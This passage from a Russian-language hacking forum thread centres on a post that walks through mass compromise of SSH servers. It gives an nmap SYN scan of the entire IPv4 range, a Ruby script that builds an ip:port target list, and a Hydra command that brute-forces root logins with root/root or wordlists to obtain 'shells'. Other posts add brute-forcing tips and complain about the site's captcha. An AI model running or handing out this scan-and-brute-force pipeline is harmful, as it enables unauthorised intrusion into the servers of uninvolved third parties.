 |
07.04.2018, 11:55
|
|
Новичок
Регистрация: 09.12.2016
Сообщений: 0
С нами:
4961332
Репутация:
0
|
|
да вроде нормально он стартует...
|
|
|
07.04.2018, 14:00
|
|
Новичок
Регистрация: 30.12.2016
Сообщений: 0
С нами:
4931546
Репутация:
0
|
|
напиши сам
|
|
|
|
12.12.2018, 01:58
|
|
Новичок
Регистрация: 11.12.2018
Сообщений: 0
С нами:
3907708
Репутация:
0
|
|
nmap + THC Hydra
Код:
Код:
nmap -sS -p22 --open -oN ~/ssh.nmap_out 0.0.0.0/0
-p22 - порт, как можно заметить, перечисление через ','(запятую 22,222,2759 и тд) или диапазоны через '-'(тире 22-220 порты с 22 по 220)
диапозоны не практично для шеллов использовать, т.к. там либо совсем кастомный порт стоит(38593, например) и скорее всего пароль что не подберешь. в твоем случае это будут 22, 222, 2222, 22222, 220, 2200 и тд, основной посыл ясен.
0.0.0.0/0 - весь рейндж ип4. сканить будет долго, так что выбирай какие-то более осмысленные диапозоны для сканирования. можно указывать битовую маску или тире.
-oN ~/ssh.nmap_out - аутпут нормал, обычный лог(как программа в терминал выведет), далее путь сохранения.
-sS - тип сканирования, tcp sync scan. за подробносятми в ман(вообще реккомендую его хотя бы по диагонали пролистать, меньше вопросов будет)
потом лог нужно обработать - составить список целей в формате
ip : port
я использовал маленькую программу на руби для этого :
Код:
Код:
#/bin/ruby
#format nmap out to ip:port
f = File.open("#{ARGV[0]}", 'r')
out=""
ip=""
f.each_line do |l|
if l.include? "Nmap scan"
ip = l.scan(/\d+.\d+.\d+.\d+/).last
end
if l.include? " open"
port=l.split "/"
out << "#{ip}:#{port[0]}\n"
end
end
File.open("#{ARGV[0]}.out", 'w').puts out
сохранит в туже директорию фаил с таким же именем, на конце будет '.out'
потом гидру запускаешь
Код:
Код:
hydra -l root -p root -M /path_to_your_targerts_file -o ~/hydra.log ssh
будет производить атаку со связкой root/root. можно указать ключи -L и -P для фаилов-списков логинов\паролей.
также стоит посмотреть на количество потоков-задач, за этим загляни в ман по софту
в целом ничего сложного там нет. но и имо, ничего интересного на на таких шеллах не найдешь, хотя, кто знает. удачи! |
|
|
|
12.12.2018, 01:59
|
|
Новичок
Регистрация: 21.10.2018
Сообщений: 0
С нами:
3979841
Репутация:
0
|
|
ТС ты хоть тестировал на нескольких хостах ?
На стороне сервера может быть масса настроек , соответственно и свою утилиту которая осуществляет брутфорс атаку зачастую нужно индивидуально настраивать под каждый сервер, как вариант поставь себе несколько 'виртуалок' и тестируй вначале на них.
|
|
|
|
12.12.2018, 03:05
|
|
Новичок
Регистрация: 14.08.2015
Сообщений: 0
С нами:
5656404
Репутация:
0
|
|
@rabbit_hole без капчи наш сайт лежал бы постоянно. Срабатывает защита. У тех, кто заходит обычным способом (без ТОР и VPN), проблем с капчей нет.
|
|
|
|
12.12.2018, 03:50
|
|
Новичок
Регистрация: 11.12.2018
Сообщений: 0
С нами:
3907708
Репутация:
0
|
|
WebWare Team сказал(а):
@rabbit_hole без капчи наш сайт лежал бы постоянно. Срабатывает защита. У тех, кто заходит обычным способом (без ТОР и VPN), проблем с капчей нет.
там сначала все впорядке было, но после н-го раза обновления попал в цикл "сохранить изменения -> капча -> окно редактирования -> сохранить изменения".
при этом обновление страницы, перезаход в ветку не помогли. перелогиниваться / сессию менять не стал уже.
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
